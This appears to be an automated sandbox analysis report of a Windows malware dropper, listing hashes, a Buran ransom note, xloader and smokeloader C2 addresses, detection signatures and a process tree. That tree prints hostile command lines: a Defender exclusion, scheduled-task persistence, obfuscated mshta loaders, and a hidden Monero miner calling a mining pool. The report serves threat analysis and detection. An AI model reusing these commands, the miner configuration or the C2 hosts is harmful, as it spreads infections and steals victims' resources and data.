Resubmissions

26-08-2021 15:30

210826-eqjwc3wpfa 10

26-08-2021 15:06

210826-zjkk6mr366 10

26-08-2021 14:31

210826-mw2gr11d6j 10

26-08-2021 01:04

210826-5ld5kf1zrj 10

26-08-2021 01:03

210826-32mdflhtr6 10

26-08-2021 00:58

210826-6fpc34ct8x 10

26-08-2021 00:41

210826-ylmpk9586e 10

26-08-2021 00:31

210826-pygyb6r89x 10

Analysis

  • max time kernel
    1802s
  • max time network
    1813s
  • platform
    windows11_x64
  • resource
    win11
  • submitted
    26-08-2021 01:03

General

  • Target

    71E2CF4709767EAB8E0E6DCD8F19D37C.exe

  • Size

    5.2MB

  • MD5

    71e2cf4709767eab8e0e6dcd8f19d37c

  • SHA1

    0641acedc06c13a17d94968e3237c4d9533fc0b9

  • SHA256

    077ac4018bc25a85796c54e06872071d561df272188dde34daca7e5d01e950fd

  • SHA512

    686cae3db08ad1c7beaf13758a74cae4eb4084d152be49510c11a13010cbb27a1407657fab57d0d732648e91e21862c0604a9ad789e55bcac803fc7be6b4b675

Malware Config

Extracted

Path

C:\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT

Family

buran

Ransom Note
!!! ALL YOUR FILES ARE ENCRYPTED !!! All your files, documents, photos, databases and other important files are encrypted. You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files. PAY FAST 500$=0.013 btc or the price will increase tomorrow bitcoin address bc1qqxnp9z0ff8x852dyflp5r9r6rzse8jl5hzmqz8 To be sure we have the decryptor and it works you can send an email: [email protected] and decrypt one file for free. But this file should be of not valuable! Do you really want to restore your files? [email protected] TELEGRAM @ payfast290 Your personal ID: 2B2-819-10A Attention! * Do not rename encrypted files. * Do not try to decrypt your data using third party software, it may cause permanent data loss. * Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.

Extracted

Family

xloader

Version

2.3

Campaign

ec33

C2

http://www.chaturvedi.fyi/ec33/

Decoy

ride-hard.net

westindiesofficial.com

technewcomer.com

anwen.ink

smarthumanresource.com

aspenhillgetaway.com

westinventures.com

sercomp.pro

fitwoop.com

advertisingviews.site

stinato.com

kidsfundshoes.com

xaufuture.com

emaildesktophelp.com

hey-events.com

v-j9.com

eurekabox.net

export-rice.net

arcadems.com

thejackparker.com

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

C2

http://readinglistforaugust1.xyz/

http://readinglistforaugust2.xyz/

http://readinglistforaugust3.xyz/

http://readinglistforaugust4.xyz/

http://readinglistforaugust5.xyz/

http://readinglistforaugust6.xyz/

http://readinglistforaugust7.xyz/

http://readinglistforaugust8.xyz/

http://readinglistforaugust9.xyz/

http://readinglistforaugust10.xyz/

http://readinglistforaugust1.site/

http://readinglistforaugust2.site/

http://readinglistforaugust3.site/

http://readinglistforaugust4.site/

http://readinglistforaugust5.site/

http://readinglistforaugust6.site/

http://readinglistforaugust7.site/

http://readinglistforaugust8.site/

http://readinglistforaugust9.site/

http://readinglistforaugust10.site/

rc4.i32
rc4.i32

Signatures

  • Buran

    Ransomware-as-a-service based on the VegaLocker family first identified in 2019.

  • Formbook

    Formbook is a data stealing malware which is capable of stealing data.

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 1 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 1 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateProcessExOtherParentProcess 22 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Xloader

    Xloader is a rebranded version of Formbook malware.

  • suricata: ET MALWARE FormBook CnC Checkin (GET)

    suricata: ET MALWARE FormBook CnC Checkin (GET)

  • suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

    suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

  • suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload

    suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload

  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • Xloader Payload 3 IoCs
  • ASPack v2.12-2.42 6 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Executes dropped EXE 64 IoCs
  • Checks BIOS information in registry 2 TTPs 14 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Loads dropped DLL 10 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 3 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 7 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 8 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 6 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
  • Suspicious use of SetThreadContext 14 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 16 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 64 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 34 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies data under HKEY_USERS 3 IoCs
  • Modifies registry class 6 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 40 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Modifies registry class
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of UnmapMainImage
    PID:3120
    • C:\Users\Admin\AppData\Local\Temp\71E2CF4709767EAB8E0E6DCD8F19D37C.exe
      "C:\Users\Admin\AppData\Local\Temp\71E2CF4709767EAB8E0E6DCD8F19D37C.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:5476
      • C:\Users\Admin\AppData\Local\Temp\7zS4650C293\setup_install.exe
        "C:\Users\Admin\AppData\Local\Temp\7zS4650C293\setup_install.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:5720
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:5980
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3220
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Mon000d7b2b59b9.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:6000
          • C:\Users\Admin\AppData\Local\Temp\7zS4650C293\Mon000d7b2b59b9.exe
            Mon000d7b2b59b9.exe
            5⤵
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:5640
            • C:\Users\Admin\AppData\Local\Temp\7zS4650C293\Mon000d7b2b59b9.exe
              "C:\Users\Admin\AppData\Local\Temp\7zS4650C293\Mon000d7b2b59b9.exe" -a
              6⤵
              • Executes dropped EXE
              PID:5936
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Mon001af0f6251.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:6016
          • C:\Users\Admin\AppData\Local\Temp\7zS4650C293\Mon001af0f6251.exe
            Mon001af0f6251.exe
            5⤵
            • Executes dropped EXE
            PID:5128
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 5128 -s 256
              6⤵
              • Program crash
              • Checks processor information in registry
              • Enumerates system info in registry
              • Suspicious behavior: EnumeratesProcesses
              PID:3772
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Mon0001207aa1161f.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:6048
          • C:\Users\Admin\AppData\Local\Temp\7zS4650C293\Mon0001207aa1161f.exe
            Mon0001207aa1161f.exe
            5⤵
            • Executes dropped EXE
            PID:1712
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Mon00a4b905d6fcf0a9.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4380
          • C:\Users\Admin\AppData\Local\Temp\7zS4650C293\Mon00a4b905d6fcf0a9.exe
            Mon00a4b905d6fcf0a9.exe
            5⤵
            • Executes dropped EXE
            PID:5960
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 5960 -s 256
              6⤵
              • Program crash
              • Checks processor information in registry
              • Enumerates system info in registry
              • Suspicious behavior: EnumeratesProcesses
              PID:4008
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Mon00f61d292f523.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1640
          • C:\Users\Admin\AppData\Local\Temp\7zS4650C293\Mon00f61d292f523.exe
            Mon00f61d292f523.exe
            5⤵
            • Executes dropped EXE
            PID:5716
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 5716 -s 296
              6⤵
              • Drops file in Windows directory
              • Program crash
              • Checks processor information in registry
              • Enumerates system info in registry
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:5844
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c Mon00271bbb5e.exe
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1104
          • C:\Users\Admin\AppData\Local\Temp\7zS4650C293\Mon00271bbb5e.exe
            Mon00271bbb5e.exe
            5⤵
            • Executes dropped EXE
            PID:6136
            • C:\Users\Admin\Documents\SK60YKig2V4zoBUiGScf6z94.exe
              "C:\Users\Admin\Documents\SK60YKig2V4zoBUiGScf6z94.exe"
              6⤵
              • Executes dropped EXE
              PID:6212
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                7⤵
                • Creates scheduled task(s)
                PID:1196
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                7⤵
                • Creates scheduled task(s)
                PID:6564
            • C:\Users\Admin\Documents\iABSwCq9xEEiihZKEGl3NhzE.exe
              "C:\Users\Admin\Documents\iABSwCq9xEEiihZKEGl3NhzE.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:6356
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 6356 -s 1504
                7⤵
                • Program crash
                • Checks processor information in registry
                • Enumerates system info in registry
                PID:2000
            • C:\Users\Admin\Documents\3VtLOyuSluoEP4r0Sz3DJnoG.exe
              "C:\Users\Admin\Documents\3VtLOyuSluoEP4r0Sz3DJnoG.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              PID:6328
              • C:\Users\Admin\Documents\3VtLOyuSluoEP4r0Sz3DJnoG.exe
                C:\Users\Admin\Documents\3VtLOyuSluoEP4r0Sz3DJnoG.exe
                7⤵
                • Executes dropped EXE
                PID:2444
              • C:\Users\Admin\Documents\3VtLOyuSluoEP4r0Sz3DJnoG.exe
                C:\Users\Admin\Documents\3VtLOyuSluoEP4r0Sz3DJnoG.exe
                7⤵
                • Executes dropped EXE
                PID:7156
            • C:\Users\Admin\Documents\mqZaRVtHqF8rycvtbmKpqRN4.exe
              "C:\Users\Admin\Documents\mqZaRVtHqF8rycvtbmKpqRN4.exe"
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:6308
            • C:\Users\Admin\Documents\ygmMAvbLwau6uzydIDUf0r01.exe
              "C:\Users\Admin\Documents\ygmMAvbLwau6uzydIDUf0r01.exe"
              6⤵
              • Executes dropped EXE
              PID:6300
            • C:\Users\Admin\Documents\tvu91LP1ztkkTQGIrTRUNBH_.exe
              "C:\Users\Admin\Documents\tvu91LP1ztkkTQGIrTRUNBH_.exe"
              6⤵
              • Executes dropped EXE
              PID:6292
            • C:\Users\Admin\Documents\CilL84Z3K9TwE9OeT2_8H7Cj.exe
              "C:\Users\Admin\Documents\CilL84Z3K9TwE9OeT2_8H7Cj.exe"
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:6256
            • C:\Users\Admin\Documents\f9kpkTIv_7sacBa4AgtedA10.exe
              "C:\Users\Admin\Documents\f9kpkTIv_7sacBa4AgtedA10.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:6240
              • C:\Users\Admin\AppData\Roaming\7989597.exe
                "C:\Users\Admin\AppData\Roaming\7989597.exe"
                7⤵
                • Executes dropped EXE
                PID:4884
                • C:\Windows\system32\WerFault.exe
                  C:\Windows\system32\WerFault.exe -u -p 4884 -s 2296
                  8⤵
                  • Program crash
                  • Checks processor information in registry
                  • Enumerates system info in registry
                  PID:5156
              • C:\Users\Admin\AppData\Roaming\5512077.exe
                "C:\Users\Admin\AppData\Roaming\5512077.exe"
                7⤵
                  PID:2112
                  • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                    "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                    8⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:6136
                • C:\Users\Admin\AppData\Roaming\4927799.exe
                  "C:\Users\Admin\AppData\Roaming\4927799.exe"
                  7⤵
                    PID:3880
                  • C:\Users\Admin\AppData\Roaming\2589432.exe
                    "C:\Users\Admin\AppData\Roaming\2589432.exe"
                    7⤵
                      PID:2932
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 2932 -s 2304
                        8⤵
                        • Program crash
                        • Checks processor information in registry
                        • Enumerates system info in registry
                        PID:1556
                  • C:\Users\Admin\Documents\5JdvbFzz5mlDvs0aBY2GW8QG.exe
                    "C:\Users\Admin\Documents\5JdvbFzz5mlDvs0aBY2GW8QG.exe"
                    6⤵
                    • Executes dropped EXE
                    • Checks BIOS information in registry
                    • Checks whether UAC is enabled
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    PID:6228
                  • C:\Users\Admin\Documents\CqQvCDQIKdt4Ibiq7B0qzude.exe
                    "C:\Users\Admin\Documents\CqQvCDQIKdt4Ibiq7B0qzude.exe"
                    6⤵
                      PID:6468
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 6468 -s 272
                        7⤵
                        • Program crash
                        • Checks processor information in registry
                        • Enumerates system info in registry
                        PID:3268
                    • C:\Users\Admin\Documents\72VIZoJACbUqw_i9cfs1uNHk.exe
                      "C:\Users\Admin\Documents\72VIZoJACbUqw_i9cfs1uNHk.exe"
                      6⤵
                        PID:6460
                        • C:\Users\Admin\Documents\72VIZoJACbUqw_i9cfs1uNHk.exe
                          C:\Users\Admin\Documents\72VIZoJACbUqw_i9cfs1uNHk.exe
                          7⤵
                          • Executes dropped EXE
                          PID:6544
                      • C:\Users\Admin\Documents\Nq_3F5ekjxAFw0C9puS4Fehc.exe
                        "C:\Users\Admin\Documents\Nq_3F5ekjxAFw0C9puS4Fehc.exe"
                        6⤵
                        • Executes dropped EXE
                        PID:6440
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 6440 -s 316
                          7⤵
                          • Program crash
                          PID:1188
                      • C:\Users\Admin\Documents\4ZZBKS8grL61WRswRHXgKOPQ.exe
                        "C:\Users\Admin\Documents\4ZZBKS8grL61WRswRHXgKOPQ.exe"
                        6⤵
                          PID:6432
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 6432 -s 292
                            7⤵
                            • Program crash
                            PID:796
                        • C:\Users\Admin\Documents\NlEyHgR5tpkeMGof82h6WWZE.exe
                          "C:\Users\Admin\Documents\NlEyHgR5tpkeMGof82h6WWZE.exe"
                          6⤵
                          • Executes dropped EXE
                          PID:6664
                        • C:\Users\Admin\Documents\WeitOOFgEpAbhQaUpI5l8OGp.exe
                          "C:\Users\Admin\Documents\WeitOOFgEpAbhQaUpI5l8OGp.exe"
                          6⤵
                          • Executes dropped EXE
                          PID:6812
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 6812 -s 308
                            7⤵
                            • Program crash
                            • Checks processor information in registry
                            • Enumerates system info in registry
                            PID:6532
                        • C:\Users\Admin\Documents\YsajQFAfcsspPaWnUuSSrlFc.exe
                          "C:\Users\Admin\Documents\YsajQFAfcsspPaWnUuSSrlFc.exe"
                          6⤵
                          • Executes dropped EXE
                          PID:6796
                        • C:\Users\Admin\Documents\lgqw6xe2U_T8KcnVrPXg4e3S.exe
                          "C:\Users\Admin\Documents\lgqw6xe2U_T8KcnVrPXg4e3S.exe"
                          6⤵
                          • Executes dropped EXE
                          PID:6772
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 6772 -s 276
                            7⤵
                            • Program crash
                            • Checks processor information in registry
                            • Enumerates system info in registry
                            PID:2224
                        • C:\Users\Admin\Documents\7sjvPdTv85_dDN7p79YDscqa.exe
                          "C:\Users\Admin\Documents\7sjvPdTv85_dDN7p79YDscqa.exe"
                          6⤵
                          • Executes dropped EXE
                          PID:7028
                          • C:\Windows\SysWOW64\mshta.exe
                            "C:\Windows\System32\mshta.exe" vbSCRipt: ClOSe( creATEoBJEcT ( "WscRIpT.sHEll" ). RUN ( "Cmd /Q /C tYPe ""C:\Users\Admin\Documents\7sjvPdTv85_dDN7p79YDscqa.exe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if """" == """" for %W iN ( ""C:\Users\Admin\Documents\7sjvPdTv85_dDN7p79YDscqa.exe"" ) do taskkill -IM ""%~nXW"" -f " ,0 , TRUE ) )
                            7⤵
                              PID:2136
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\Documents\7sjvPdTv85_dDN7p79YDscqa.exe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "" =="" for %W iN ( "C:\Users\Admin\Documents\7sjvPdTv85_dDN7p79YDscqa.exe" ) do taskkill -IM "%~nXW" -f
                                8⤵
                                  PID:6540
                                  • C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe
                                    WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9
                                    9⤵
                                    • Checks processor information in registry
                                    • Enumerates system info in registry
                                    PID:1188
                                    • C:\Windows\SysWOW64\mshta.exe
                                      "C:\Windows\System32\mshta.exe" vbSCRipt: ClOSe( creATEoBJEcT ( "WscRIpT.sHEll" ). RUN ( "Cmd /Q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if ""-PifOcLbay~PF~N8a_e9RyKpu9 "" == """" for %W iN ( ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" ) do taskkill -IM ""%~nXW"" -f " ,0 , TRUE ) )
                                      10⤵
                                        PID:6084
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "-PifOcLbay~PF~N8a_e9RyKpu9 " =="" for %W iN ( "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" ) do taskkill -IM "%~nXW" -f
                                          11⤵
                                            PID:2132
                                        • C:\Windows\SysWOW64\rundll32.exe
                                          "C:\Windows\System32\rundll32.exe" ~IWm4Wh.I,nKhkoYTFE
                                          10⤵
                                          • Loads dropped DLL
                                          PID:6688
                                      • C:\Windows\SysWOW64\taskkill.exe
                                        taskkill -IM "7sjvPdTv85_dDN7p79YDscqa.exe" -f
                                        9⤵
                                        • Kills process with taskkill
                                        PID:2840
                                • C:\Users\Admin\Documents\wvmD8oKBBaVONnn11oGH1rUI.exe
                                  "C:\Users\Admin\Documents\wvmD8oKBBaVONnn11oGH1rUI.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  PID:6972
                                  • C:\Program Files (x86)\Company\NewProduct\cutm3.exe
                                    "C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
                                    7⤵
                                    • Executes dropped EXE
                                    PID:3152
                                  • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                    "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                    7⤵
                                    • Executes dropped EXE
                                    • Checks whether UAC is enabled
                                    PID:5128
                                  • C:\Program Files (x86)\Company\NewProduct\inst1.exe
                                    "C:\Program Files (x86)\Company\NewProduct\inst1.exe"
                                    7⤵
                                    • Executes dropped EXE
                                    PID:868
                                  • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                    "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                    7⤵
                                    • Executes dropped EXE
                                    PID:7020
                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      8⤵
                                      • Executes dropped EXE
                                      PID:3060
                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                      8⤵
                                        PID:6936
                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                        8⤵
                                          PID:4440
                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                          8⤵
                                            PID:5752
                                      • C:\Users\Admin\Documents\Xi4HqKZZXc1thEIujg7aeJVU.exe
                                        "C:\Users\Admin\Documents\Xi4HqKZZXc1thEIujg7aeJVU.exe"
                                        6⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetThreadContext
                                        PID:6180
                                        • C:\Users\Admin\Documents\Xi4HqKZZXc1thEIujg7aeJVU.exe
                                          "C:\Users\Admin\Documents\Xi4HqKZZXc1thEIujg7aeJVU.exe"
                                          7⤵
                                          • Executes dropped EXE
                                          • Checks SCSI registry key(s)
                                          • Suspicious behavior: MapViewOfSection
                                          PID:6508
                                      • C:\Users\Admin\Documents\B9NHu0grQz6OXEWRIPx6jRwF.exe
                                        "C:\Users\Admin\Documents\B9NHu0grQz6OXEWRIPx6jRwF.exe"
                                        6⤵
                                        • Executes dropped EXE
                                        • Checks BIOS information in registry
                                        • Checks whether UAC is enabled
                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                        PID:7144
                                      • C:\Users\Admin\Documents\sfDwcltTn4GsBKM_Hu2EqxdJ.exe
                                        "C:\Users\Admin\Documents\sfDwcltTn4GsBKM_Hu2EqxdJ.exe"
                                        6⤵
                                        • Executes dropped EXE
                                        PID:720
                                      • C:\Users\Admin\Documents\StuWzOHhE5uh6G5HONiqHht3.exe
                                        "C:\Users\Admin\Documents\StuWzOHhE5uh6G5HONiqHht3.exe"
                                        6⤵
                                        • Executes dropped EXE
                                        PID:2380
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c Mon0015a1e17ea5.exe
                                    4⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:4492
                                    • C:\Users\Admin\AppData\Local\Temp\7zS4650C293\Mon0015a1e17ea5.exe
                                      Mon0015a1e17ea5.exe
                                      5⤵
                                      • Executes dropped EXE
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:5792
                                      • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                        6⤵
                                        • Executes dropped EXE
                                        PID:5592
                                        • C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
                                          "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
                                          7⤵
                                          • Executes dropped EXE
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:5876
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                            8⤵
                                              PID:6568
                                              • C:\Windows\system32\schtasks.exe
                                                schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                9⤵
                                                • Creates scheduled task(s)
                                                PID:1192
                                            • C:\Users\Admin\AppData\Roaming\services64.exe
                                              "C:\Users\Admin\AppData\Roaming\services64.exe"
                                              8⤵
                                              • Executes dropped EXE
                                              • Suspicious use of SetThreadContext
                                              PID:6204
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
                                                9⤵
                                                  PID:1292
                                                  • C:\Windows\system32\schtasks.exe
                                                    schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
                                                    10⤵
                                                    • Creates scheduled task(s)
                                                    PID:5388
                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                  "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                  9⤵
                                                    PID:5932
                                                  • C:\Windows\explorer.exe
                                                    C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
                                                    9⤵
                                                      PID:2848
                                                      • C:\Program Files (x86)\P3f8p\rz_vzw.exe
                                                        "C:\Program Files (x86)\P3f8p\rz_vzw.exe"
                                                        10⤵
                                                          PID:6736
                                                  • C:\Users\Admin\AppData\Local\Temp\test.exe
